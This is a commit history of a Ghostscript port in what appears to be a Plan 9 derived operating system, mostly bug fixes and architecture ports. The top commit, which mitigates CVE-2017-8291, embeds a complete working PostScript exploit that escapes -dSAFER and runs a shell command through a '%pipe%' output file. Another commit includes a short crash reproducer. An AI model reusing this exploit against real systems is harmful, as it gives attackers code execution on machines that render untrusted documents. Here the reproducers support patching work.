Commit graph

32 commits

Author SHA1 Message Date
cinap_lenrek 0af7d1fe35 gs: apply mitigations against CVE-2017-8291 (thanks jsmoody)
To reproduce:
gs -q -dNOPAUSE -dSAFER '-sDEVICE=ppmraw' '-sOutputFile=/dev/null' <<.
%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: -0 -0 100 100


/size_from  10000      def
/size_step    500      def
/size_to   65000      def
/enlarge    1000      def

%/bigarr 65000 array def

0
size_from size_step size_to {
    pop
    1 add
} for

/buffercount exch def

/buffersizes buffercount array def


0
size_from size_step size_to {
    buffersizes exch 2 index exch put
    1 add
} for
pop

/buffers buffercount array def

0 1 buffercount 1 sub {
    /ind exch def
    buffersizes ind get /cursize exch def
    cursize string /curbuf exch def
    buffers ind curbuf put
    cursize 16 sub 1 cursize 1 sub {
        curbuf exch 255 put
    } for
} for


/buffersearchvars [0 0 0 0 0] def
/sdevice [0] def

enlarge array aload

{
    .eqproc
    buffersearchvars 0 buffersearchvars 0 get 1 add put
    buffersearchvars 1 0 put
    buffersearchvars 2 0 put
    buffercount {
        buffers buffersearchvars 1 get get
        buffersizes buffersearchvars 1 get get
        16 sub get
        254 le {
            buffersearchvars 2 1 put
            buffersearchvars 3 buffers buffersearchvars 1 get get put
            buffersearchvars 4 buffersizes buffersearchvars 1 get get 16 sub put
        } if
        buffersearchvars 1 buffersearchvars 1 get 1 add put
    } repeat

    buffersearchvars 2 get 1 ge {
        exit
    } if
    %(.) print
} loop

.eqproc
.eqproc
.eqproc
sdevice 0
currentdevice
buffersearchvars 3 get buffersearchvars 4 get 16#7e put
buffersearchvars 3 get buffersearchvars 4 get 1 add 16#12 put
buffersearchvars 3 get buffersearchvars 4 get 5 add 16#ff put
put


buffersearchvars 0 get array aload

sdevice 0 get
16#3e8 0 put

sdevice 0 get
16#3b0 0 put

sdevice 0 get
16#3f0 0 put


currentdevice null false mark /OutputFile (%pipe%echo gotce)
.putdeviceparams
1 true .outputpage
.rsdparams
%{ } loop
0 0 .quit
%asdf

.
2019-06-21 18:57:20 +02:00
cinap_lenrek c9a1045d49 gs: fix missing type check in ztype (thanks jsmoody)
to reproduce:

gs <<.
null [[][][][][][][][][][][][][][][]] .type
.
2019-05-24 14:17:18 +02:00
cinap_lenrek e55778d67e gs: apply fixes for CVE-2018-16509 (thanks jsmoody) 2019-05-23 14:59:28 +02:00
cinap_lenrek bbf532dba8 gs: arm64 support 2019-05-03 21:10:45 +02:00
cinap_lenrek 5f5caa6733 gs: avoid stupid shifts by casting to uint64_t 2019-05-03 21:10:01 +02:00
mischief d18440d992 gs: validate parameter is dict in .initialize_dsc_parse
gs bug 697190, upstream commit 875a0095

also check gs_alloc_struct return value from upstream commit a2afc66d
2017-03-14 00:48:50 -07:00
mischief 07a14612a1 gs: check for sufficient params in .sethalftone5
ghostscript bug 697203, upstream commit f5c7555c303
2017-03-13 18:12:17 -07:00
cinap_lenrek 9b2d3ed37a gs: fix dangling pointer crash with "lock" (ghostscript Bug 697204) 2017-03-13 18:56:52 +01:00
cinap_lenrek 986886f2b8 retire the dec alpha port 2016-05-04 16:11:48 +02:00
cinap_lenrek 8f4db30e78 gs: replace openssl aes implementation with ape/libsec 2016-04-11 20:27:50 +02:00
glenda c4fdc6bfdb fix fuckup 2015-08-25 09:35:10 +00:00
mischief 6b402b83cf import E script from bell labs 2015-08-25 02:07:46 -07:00
cinap_lenrek 2fe2ffe813 gs: fix alignment bug in image_render_interpolate() 2015-08-16 18:20:22 +02:00
cinap_lenrek 79213052a2 gs: fix build for objtype=spim 2015-08-08 08:31:49 +02:00
cinap_lenrek 81cbff917f gs: avoid 6c type propagation / constant folding issue for set_cb_end()
6c changed "- cmd_lagest_size + 1" into an *unsigned* 32bit constant, which
got added to a 64bit pointer, making pcb->limit > pcb->end and resulting
in errors for partial commands in the buffer. Removing the parentheses
propagates the operation to 64bit.
2015-04-17 06:18:43 +02:00
cinap_lenrek b69556052e gs: fix bug 694539. Reading off the end of the cbuf when dash pattern len is max 2015-03-08 05:27:24 +01:00
cinap_lenrek ccb624e2bb gs: backport 16MB string support 2015-02-21 10:55:09 +01:00
cinap_lenrek 0b016a77e4 gs: backport aes support for pdf-1.6 2015-02-20 00:21:45 +01:00
mischief cd3a742b32 all: typo fixes from ray@raylai.com 2014-11-07 10:39:50 -08:00
cinap_lenrek ff7d68e41a gs: fix /undefined in --setcolor-- errors on amd64 2014-05-05 00:49:26 +02:00
cinap_lenrek 826f4c0daf gs: remove PStorage data type from ttf interpreter
I don't see that pointers are stored in PStorage at all,
so just use PLong directly, avoiding all this confusion.
2014-05-04 00:17:27 +02:00
cinap_lenrek 9cc9d6113c gs: fix truetype interpreter for amd64 2014-05-04 23:31:59 +02:00
cinap_lenrek 8006695405 gs: amd64 support 2014-02-01 10:28:33 +01:00
cinap_lenrek b1955840c5 rename ape manpages so they don't get filtered out as object files 2011-05-04 06:19:09 +00:00
cinap_lenrek 9d24a107a5 boot(8): changed tread to read, other: fix perms 2011-04-18 01:59:36 +00:00
sl 69e36b384a remove junk generated by build. 2011-04-15 15:53:56 +00:00
sl 19ab1fbdb6 add /sys/lib/dist/bin/386, required for build. 2011-04-15 15:49:51 +00:00
cinap_lenrek 85b5f73c40 perms 2011-04-11 15:20:31 +00:00
cinap_lenrek 9ace6c0363 ape dirs 2011-03-30 18:46:53 +00:00
Taru Karttunen a9060cc06b Import sources from 2011-03-30 iso image - lib 2011-03-30 19:35:09 +03:00
cinap_lenrek c3ceeded2d ... 2011-03-30 16:05:55 +00:00
Taru Karttunen e5888a1ffd Import sources from 2011-03-30 iso image 2011-03-30 15:46:40 +03:00